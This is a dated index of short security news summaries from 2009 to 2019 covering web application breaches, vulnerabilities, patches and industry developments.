Web application and API security best practices
- October 09, 2019
Twitter used two-factor authentication information, including email addresses and phone numbers, to target ads for an unknown number of people over an unknown period of time.
- April 30, 2019
Since the start of 2018, Facebook has had a seemingly constant cascade of security issues and privacy scandals. Here's a look back at the social media giant's most serious issues.
- November 16, 2018
The promised integration with Have I Been Pwned is expanding in Firefox Monitor with new breach alerts when a user visits a recently compromised website.
- July 24, 2018
Successful phishing attempts have been eliminated among Google employees following a requirement to use physical security keys in order to gain access to all Google accounts.
- June 29, 2018
With new Have I Been Pwned integration, Firefox and 1Password users will be able to learn if their email addresses have been compromised in any known data breaches.
- May 04, 2018
On none other than World Password Day, a Twitter bug was announced that led to the passwords of all 336 million users being stored in plaintext in an internal log.
- April 03, 2018
Cloudflare promises its new 220.127.116.11 DNS service is faster and enables better privacy for web browsing than competing offerings, but it's unclear how different its service will be.
- January 25, 2018
The Electron framework -- used to develop desktop apps using web code -- included a remote code execution flaw that was passed on to popular apps like Slack.
- December 07, 2017
The latest version of the OWASP Top Ten web application risks is much like previous versions, and that's not a bad thing at all.
- March 17, 2017
Although minting authentication cookies is not widely understood, the Yahoo hacker indictments has brought it to the forefront and shown it can be very dangerous.
- March 03, 2017
News roundup: A researcher discovers a Slack hack through stolen tokens. Plus, another WordPress flaw puts 1 million users at risk; Necurs botnet does DDoS now; and more.
- January 17, 2017
Researchers saw a Gmail phishing campaign in the wild using clever tricks to access accounts including a difficult 2FA bypass only possible in real time.
- January 13, 2017
New Microsoft privacy tools will give users control over the data collected on the web and within Windows. Experts hope the tools will offer data privacy transparency.
- December 14, 2016
A new Certificate Transparency Monitoring tool from Facebook may help webmasters track and vet TLS certificates, as well as improve integrity and security for HTTPS traffic.
- July 27, 2016
Problems with LastPass security might have been improperly disclosed, putting user passwords at higher risk, but the flaws have already been fixed, with an update rolling out now.
- May 19, 2016
The ImageTragick bug raises questions over responsible disclosure, as the flaw in the ImageMagick image-processing library exposes millions of websites to remote code execution.
- April 12, 2016
Customers with hosted sites will now have WordPress SSL turned on for free by default, thanks to Let's Encrypt certificates, potentially making a large number of websites more secure.
- April 05, 2016
Security researchers updated BREACH attack that would allow a Facebook Messenger or Gmail breach to be performed much faster, but the overall risk is limited.
- January 07, 2016
Researchers have found a new way to exploit an MD5 vulnerability to put users at risk, and experts say this is all the more reason to move faster in transitioning to SHA-256.
- December 11, 2015
News roundup: Cyber politics in U.S., as leaders attempt to balance access to strong encryption with terror threats. Also: Microsoft's German data centers, SHA-1 deprecation schedule, and more.
- December 04, 2015
Adobe moves could signal the end of the ever-vulnerable Flash Player, and experts say more support for HTML5 could lead to the Adobe Flash end of life.
- November 13, 2015
News roundup: WebSphere, JBoss, Jenkins and more hit by Java vulnerability in an open source library. Plus, SAP HANA deals with critical vulnerabilities, and more.
- September 18, 2015
News roundup: Additional research shows a Cisco router implant affects more devices than originally reported. Plus: Let's Encrypt's first cert issued; Tor in the library; the mitigated (but not fixed) iOS AirDrop vulnerability.
- August 27, 2015
Malvertising campaigns are becoming more effective due to the popularity of the Angler EK and its use of Flash zero-day vulnerabilities. And one expert says ad blockers are not the answer.
- August 27, 2015
An up-to-date application security program -- as well as knowing how to connect with stakeholders -- is critical to being a successful CISO today, said Renee Guttmann, vice president, Office of the CISO at Accuvant Inc.
- August 14, 2015
Dropbox announced it is strengthening login options with support for universal 2nd factor (U2F) security keys with the aim of making two-step verification faster and easier.
- July 31, 2015
News roundup: New threats add to the Tor anonymity debate, as a new browser aims to take anonymous browsing to the next level. Plus: Android security outlook is bad -- or is it? Also, another Xen host escape flaw and Wassenaar revisions put on hold.
- July 17, 2015
News roundup: Are the tides turning on mobile app safety? One white hat hacker's attempt to reverse-engineer the Subway app offers surprising results. Plus: CloudFlare Transparency Report; another call to eliminate RC4; Black Hat attendant survey.
- June 19, 2015
News roundup: Details have emerged about weaknesses in OS X and iOS that allow attackers to upload malware and steal passwords and data. Plus: More jump on HTTPS bandwagon; CSO/CDO salaries increase; 23% of software app components contain flaws.
- June 12, 2015
News roundup: The call for ubiquitous HTTPS has grown stronger as of late; the White House and Apple are hoping to help push the movement. Plus: The cost of cybersecurity management to rise 38%; a 165% ransomware increase; gender salary gap closes?
- June 05, 2015
News roundup: New settings and options to boost user privacy and security are emerging on major websites, but is it enough?
- May 20, 2015
Google's new Chrome extension policy mandates that all users and developers must install web browser extensions from the Chrome Web Store.
- May 15, 2015
News roundup: Microsoft released security details of its new Edge browser, but is enough to restore user confidence? Plus: Millennial security threats; new ransomware, GPU-based malware; black hat cybersecurity services.
- May 08, 2015
WordPress was found to have two new zero-day XSS vulnerabilities that were being exploited, but a patch has already been issued to mitigate the issues.
- April 27, 2015
A researcher has released a proof-of-concept exploit for a WordPress vulnerability leveraging stored XSS, which could lead to remote code execution on affected servers.
- April 23, 2015
At RSA Conference 2015, John Pescatore offered real-world case studies proving that information security technologies can help prevent data breaches.
- January 30, 2015
News roundup: YouTube announced it has stopped using Flash by default in favor of HTML5. Is this the long-awaited end for Flash? Plus: Java was the riskiest software in 2014; BEC scam cost $215 last year; NFL data interceptions.
- January 16, 2015
News roundup: Recently discovered firmware flaws highlight the challenges posed by hardware security. Plus: Heartland's breach warranty; RSA's overhaul; and Download.com's app (in)security.
- July 18, 2014
With another round of patches for several serious Java flaws, Oracle's quarterly CPU showed that Java security problems are not receding.
- July 01, 2014
A new online archive is allowing researchers to anonymously submit and expose cross-site scripting vulnerabilities uncovered across the Web.
- June 26, 2014
Special report: The handling of an OWASP employee's disputed harassment claim has sparked a debate over the group's governance and its future.
- June 17, 2014
With mobile, cloud and the Internet of Things driving massive API growth, experts say now is the time for API gateway technology to shine.
- April 22, 2014
The 2014 Verizon data breach report shows a big rise in Web application attacks, with CMS frameworks and user credentials the most likely targets.
- April 17, 2014
When it comes to app risk management, who is ultimately responsible: business leaders or security professionals? A new report weighs in.
- March 21, 2014
Researchers have warned of numerous HealthCare.gov security issues. Michael Cobb reviews the website security lessons learned for enterprises.
- January 27, 2014
A researcher says Oracle hasn't properly addressed long-standing Oracle Forms and Reports flaws, which could be exploited to gain remote access.
- January 21, 2014
The first Oracle Critical Patch Update of 2014 included fixes for 36 Java vulnerabilities, but only 5 Oracle Database vulnerabilities. Why so few?
- February 08, 2013
Professor Kenneth Paterson and graduate student Nadhem AlFardan have discovered a TLS attack that tracks the timing of error messages to reveal plaintext.
- December 12, 2012
Cybercriminal gang associated with the Butterfly Botnet is believed to have netted more than $850 million by stealing credit card and bank account data.
- December 11, 2012
The website flaw was exposed by hackers who registered as employers and posted a fake job advertisement.
- September 19, 2012
Vulnerabilities in HTML 5 make it an emerging threat; however, SQL injection and XSS remain among the top attacks.
- August 29, 2012
Basic Java sandboxing has been around since 1995, but flaws in the Java virtual machine are highly targeted. Experts are calling on Oracle to do more.
- August 28, 2012
The Java zero-day flaw affects users of Mozilla, Internet Explorer and Safari.
- August 15, 2012
Security researchers have detected attacks targeting users of Internet Explorer with a Flash file embedded in a Microsoft Word document.
- July 31, 2012
Researchers from IBM's X-Force Advanced Research Team demonstrated how an attacker could escape a Flash sandbox implementation at Black Hat.
- July 17, 2012
Attack toolkits have grown in sophistication as cybercriminals add better code obfuscation and other techniques to avoid detection and improve attack effectiveness.
- July 16, 2012
The Google Chrome Native Client was designed to secure browser plug-ins, but researcher Chris Rohlf says Google Chrome sandbox security flaws exist.
- June 06, 2012
A warning banner is prompted if malicious activity appears to be state-sponsored. The feature is supported by its security operations team.
- April 18, 2012
A review of hundreds of unique custom Web applications found more than half are vulnerable to cross-site scripting and more than 86% contain injection flaws.
- February 06, 2012
Adobe has launched the pubic beta of a new Flash Player sandbox feature for Firefox users, making attacks more difficult for cybercriminals.
- January 30, 2012
Security firm M86 Security has discovered hundreds of WordPress websites compromised by Phoenix.
- January 27, 2012
Column: Third-party applications are notoriously hard to patch and often easy to exploit. Is it time to ban applications, or can they be secured with a new approach?
- January 26, 2012
Column: Third-party applications are hard to patch and easy to exploit. Is it time to ban some apps, or to take a new approach?
- January 24, 2012
Web-based antimalware vendor Dasient is the second security firm acquired by Twitter in recent months. In November, Twitter acquired Android security vendor, Whisper Systems.
- November 28, 2011
Twitter acquired WhisperSystems, a firm that makes mobile encryption and firewall technology for Android devices.
- October 26, 2011
- October 25, 2011
Researchers in Germany have demonstrated weaknesses in the W3C XML encryption standard used to secure websites and other Web applications.
- September 13, 2011
Cybercriminals are using the old technique to lure victims into giving up personal information and potentially infect their systems with malware.
- September 06, 2011
New features in Java 7 aim at bolstering security by switching off weaker encryption schemes.
- August 04, 2011
Black Hat 2011: A free Microsoft .NET application security tool helps programmers reverse-engineer .NET applications to manipulate and control them.
- August 04, 2011
For most security teams, it’s still a struggle to find money for secure application development, according to a panel of Black Hat 2011 experts.
- July 26, 2011
Automated attack tools are targeting directory traversal bugs, cross-site scripting errors, SQL injection flaws and remote file inclusion vulnerabilities.
- June 14, 2011
Citigroup hackers used a common website vulnerability to bypass security controls and reap confidential banking data.
- February 08, 2011
A survey of more than 600 IT security professionals finds nearly three quarters have been hacked at least once in the last 24 months through insecure Web applications.
- January 27, 2011
The TippingPoint Zero-Day Initiative (ZDI) program fixed 300 vulnerabilities in 2010, triple the number of flaws repaired in 2009.
- January 24, 2011
The proposal, which transmits a special HTTP header to websites, may be supported in future versions of Firefox, but in order for it to fully work, websites must also support the feature.
- January 18, 2011
Adobe Systems, Google, Microsoft and others are deploying applications that use sandboxing technology to defend against potential attacks, but savvy hackers know how to bypass it.
- January 14, 2011
Engineers at Adobe Systems Inc. are working on a redesign of the Flash Player Settings Manager to incorporate features requested by users and privacy advocates.
- January 06, 2011
Adobe is responding to a new method that breaks a security feature and prevents Flash files from passing data to remote systems; it is classified as "moderate" security threat.
- September 28, 2010
Attackers are targeting a weakness in the ASP.NET Web application framework. A fix is expected today at 1 p.m. ET.
- September 21, 2010
A cross-site scripting Twitter attack could have been exploited to spread dangerous malware and steal user data, experts said.
- September 21, 2010
Microsoft issued an update to its security advisory after discovering limited, active attacks against .NET Web applications with flawed encryption implementations.
- June 25, 2010
The CISO for the city of Portland, Ore., advises that every enterprise be aware of one must-have secure Web gateway feature before buying.
- June 22, 2010
Trustwave said it would integrate Breach's Web application firewall into its pen-testing and code-review services. The vendor says it's committed to ModSecurity.
- June 22, 2010
The research firm argues social networking isn't the responsibility of enterprise information security, but social media governance policies and monitoring practices are important.
- April 22, 2010
Adding the "human element" to scanners could help pen testers evaluate a larger portion of an application's attack surface, according to two researchers at SOURCE Boston 2010.
- March 12, 2010
Jeremiah Grossman told RSA Conference 2010 attendees that a successful defense against Web-based flaws requires both a secure browser and a secure website infrastructure.
- February 08, 2010
With sales and marketing teams using social networks to connect with clients and potential customers, CISOs need to meet business needs while addressing risks.
- January 12, 2010
A variety of new tools and methods can help social networks monitor third-party applications for traffic anomalies and user content coding that could signal trouble.
- January 11, 2010
Social networks are opening their wallets in a big way to bolster security teams and install new security technologies to combat attacks.
- December 16, 2009
In addition to the browsers, Adobe Systems' PDF software as well as its Flash and Shockwave players made the annual list.
- December 08, 2009
The Cisco Annual Security Report highlights the best and worst in the cybercriminal investment portfolio for 2010.
- November 17, 2009
New InZero gateway uses hardware to halt malware by separating the endpoint from the network and isolating desktop software.
- November 10, 2009
Cybercriminals turn to cloud computing to feed commands to the throngs of zombie computers under their control and avoid detection.
- October 29, 2009
Kaspersky Krab Krawler analysis finds users fueling the number of malicious links on Twitter by posting URLs to infected websites.
- October 27, 2009
Cisco said the move would complement its line of IronPort appliances by offering customers Web security gateway services in the cloud.
- October 22, 2009
Web application firewall deployments have been mostly driven by the Payment Card Industry Data Security Standards, but one firm has discovered alternative benefits.
- October 13, 2009
The acquisition broadens Barracuda's delivery model for URL filtering and securing Web applications through software as a service (SaaS) and hybrid approaches.
- September 16, 2009
Security experts point to online advertising campaigns that distributed faulty code to affiliates as the source of spikes in SQL injection attacks.
- September 15, 2009
A new report from the SANS Institute calls flaws in client-side applications often the most ignored by IT professionals.